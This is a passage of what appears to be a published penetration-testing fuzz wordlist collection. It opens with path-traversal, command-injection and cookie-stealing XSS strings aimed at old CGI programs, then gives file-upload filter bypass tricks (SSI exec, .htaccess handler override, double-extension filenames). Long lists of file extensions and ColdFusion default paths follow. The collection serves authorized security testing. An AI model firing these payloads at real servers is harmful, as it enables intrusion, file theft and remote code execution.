windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
# PHP on Windows<br />
{PHPSCRIPT}.php::$DATA<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{PREFIX}/templates_compiled/<br />
{PREFIX}/templates_c/<br />
{PREFIX}/templates/<br />
{PREFIX}/temporary/<br />
{PREFIX}/images/<br />
{PREFIX}/cache/<br />
{PREFIX}/temp/<br />
{PREFIX}/files/<br />
{PREFIX}/tmp/<br />
<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
